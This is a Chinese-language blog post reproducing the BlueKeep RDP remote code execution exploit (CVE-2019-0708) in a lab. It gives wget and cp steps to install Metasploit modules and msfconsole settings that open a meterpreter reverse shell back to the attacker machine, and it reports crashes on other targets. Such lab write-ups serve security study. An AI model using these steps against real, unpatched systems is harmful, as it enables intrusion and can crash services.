9.7号凌晨一点多,开发者 @rapid7  在Github上放出了windows远程桌面服务RCE漏洞(CVE-2019-0708)的exp。一大早醒来,朋友圈就被各大公司安全预警给刷了屏,趁着上午,立马把该exp复现了一波。

漏洞影响Windows版本

  • Windows XP SP3 x86
  • Windows XP Professional x64 Edition SP2
  • Windows XP Embedded SP3 x86
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 x64 Edition SP2
  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for Itanium-Based Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows 8和Windows 10及之后版本的用户不受此漏洞影响。

复现环境:

  • Kali:192.168.10.11
  • Win7(X64,SP1):192.168.10.16
  • Windows Server 2008 SP2 DataCenter(X64):192.168.10.15 (不在漏洞范围内)

首先,在Kali主机上下载相关的rb文件。

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

然后将这些主机文件复制到MSF的相应目录下(其实,主要的攻击文件只有一个:cve_2019_0708_bluekeep_rce.rb,其他几个文件可有可无)。

有可能你的MSF的目录不一样,这就需要你自己查找相应的目录。

正常的kali是下面这些命令,因为MSF是装在 /usr/share目录下
cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/    #这里有可能提示不存在这个目录,我们去相应的目录下新建rdp文件夹即可
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/这里因为我的MSF是更新后的,装在 /opt 目录下,所以,我是下面这几个命令
cp rdp.rb  /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit
cp rdp_scanner.rb  /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner
cp cve_2019_0708_bluekeep_rce.rb   /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp  #这里有可能提示不存在这个目录,我们去相应的目录下新建rdp文件夹即可
cp cve_2019_0708_bluekeep.rb  /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp

进入MSF,重载模块:reload_all

查找漏洞利用模块,进入模块

search 0708
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

查看targets

设置参数

set payload windows/x64/meterpreter/reverse_tcp   #设置payload
set rhosts 192.168.10.16             #目标机ip
set lhost 192.168.10.11              #攻击机ip
set rdp_client_ip 192.168.10.16      #目标机ip
unset RDP_CLIENT_NAME                #取消设置这个参数
set target 2    #这里我是vmware的虚拟机,按理来说target应该是设置为3,但是设置为3没打成功,设置为2打成功了

攻击成功,成功拿到目标机反弹回来的shell。

按照这个步骤,攻击Windows Server 2008R2蓝屏。看网上说貌似是要改注册表,需要修改注册表HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\WinStations\rdpwd\fDisableCam 值修改为0。但是我的这个DataCenter的Server2008R2 没有这个注册表。而且好像貌似 DataCenter的Server 2008R2 并不在漏洞影响系统之内。所以打成蓝屏了。

看了网上很多人的文章,也都是说打的蓝屏。总的来说,这个漏洞的质量并没有MS17_010永恒之蓝的高,没打成就变成蓝屏了。而且利用起来貌似限制蛮多的。单核服务器上成功率约90%, 双核上 40-60%, 四核上10%,如果失败,目标系统会蓝屏。

参考文章:https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0

CVE-2019-0708/1181/1182:Windows RDP服务蠕虫级漏洞修复指南(Version 3.0)

【预警通告】Windows远程桌面服务远程代码执行漏洞(CVE-2019-0708)EXP披露预警

CVE-2019-0708 远程桌面漏洞复现相关推荐

  1. Window 远程桌面漏洞风险,各个厂家的扫描修复方案(CVE-2019-0708)

    Window 远程桌面漏洞风险,各个厂家的扫描修复方案(CVE-2019-0708) 自微软公司于2019年5月14日发布远程桌面服务远程代码执行漏洞(CVE-2019-0708)安全公告后,整个业界 ...

  2. 白帽子黑客与网络安全工程师带你:远程桌面漏洞利用与Windows7计算机攻防实战

    一.课前声明: 1.本分享仅做学习交流,请自觉遵守法律法规! 2.搜索:Kali 与编程,学习更多网络攻防干货! 3.Kali 与编程每天准时更新,敬请学习和关注! 二.战略安排 2.1 打开Meta ...

  3. cve20190708补丁的kb名称_微软远程桌面漏洞修复补丁下载|

    cve20190708补丁即微软远程桌面漏洞补丁,仅在win7以下的系统出现,zip压缩包内包含x86(32位)以及x64(64位)两个安装包,各位根据自己的实际需求进行选择安装,仅针对远程桌面服务远 ...

  4. 远程桌面漏洞poc_【漏洞复现】CVE 2019-0708 漏洞利用

    0x00 前言 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统.此漏洞是预身份验证且无需用户交互,这就意味着这 ...

  5. 远程桌面漏洞poc_十万火急,速打补丁!Windows RDP服务蠕虫级漏洞攻击被公开

    Windows RDP服务蠕虫级漏洞CVE-2019-0708攻击方法已放出,该漏洞可能导致类似WannaCry的蠕虫病毒爆发,攻击者亦可利用漏洞入侵后释放勒索病毒,漏洞威力不逊于永恒之蓝. 速打补丁 ...

  6. WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权

    前言 发现这个漏洞的时候, 笔者正在机房上课.正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑. 没想到就随手扫描到一台WIN ...

  7. [原创]WIN8系统的远程桌面漏洞 利用QQ拼音纯净版实现提权

    前言 发现这个漏洞的时候, 笔者正在机房上课.正想用3389远程桌面去控制宿舍电脑的时候,因为重做系统忘记自己的IP地址,因此就随手扫描了一下IP段开3389端口的电脑. 没想到就随手扫描到一台WIN ...

  8. Windows Server 2019服务器远程桌面服务部署+深度学习环境配置教程

    文章目录 1.安装Windows Server 2019 2.开启WLAN服务 3.固定IP地址 4.开启远程桌面服务 4.1 添加远程桌面服务 4.2 激活服务器 4.3 安装许可证 5.配置远程桌 ...

  9. webmin 远程代码漏洞复现

    漏洞简介 webmin是一款强大的Unix系统管理工具,在其版本为1.882到1.920存在CVE-2019-15107漏洞,当版本为1.890时,工具在默认配置下易受漏洞的威胁,而在其它版本当用户关 ...

最新文章

  1. 2018年人工智能13大预测
  2. django 基础知识 ~ forms详解
  3. 关于Yii2中CSS,JS文件的引入心得
  4. php阿里云oss文件上传
  5. MM模块几个移动类型之间的区别
  6. C++的new、delete需要注意的一点:使用危险函数导致的越界CRT detected that the application wrote to memory after end of heap
  7. mysql查询没有权限试图_MySQL迁移后提示查询view权限不足的处理
  8. 阿里集团公布2022“研究型实习生”计划
  9. SQL server连接数据库
  10. 编码器控制电机正反转梯形图_旋转编码器如何控制电机正反转?PLC如何实现?
  11. 怎么彻底卸载cad2017_彻底卸载CAD的方法图解步骤
  12. 投身开源,需要持之以恒的热爱与贡献 —— Apache Spark Committer 姜逸坤
  13. python爬取豆瓣电视剧页面
  14. 网络数据传输的封装总结
  15. Open3D 渐进式形态学滤波
  16. FireFox 必备插件(四)
  17. 【微信小程序】--注册小程序账号安装开发者工具(一)
  18. windows设置开机延时自启动程序
  19. 嘀嗒出行的IPO备战
  20. 卓越的领导都会讲故事

热门文章

  1. 数据压缩:protobuf 的使用
  2. Java重写HashMap的toString方法
  3. Dubbo如何实现基于http的jsonrpc调用
  4. FPGA 20个例程篇:15.VGA显示八种颜色的彩条
  5. STATA学习笔记:分组统计和分组回归
  6. 2011-09-16 IT界的那点事
  7. 集成第三方推送最佳实践
  8. Matlab多元非线性回归(nlinfit 函数)
  9. 12:Integer to Roman(数字转为罗马数字)
  10. mac自带apache服务器吗,Mac开启自带的Apache服务器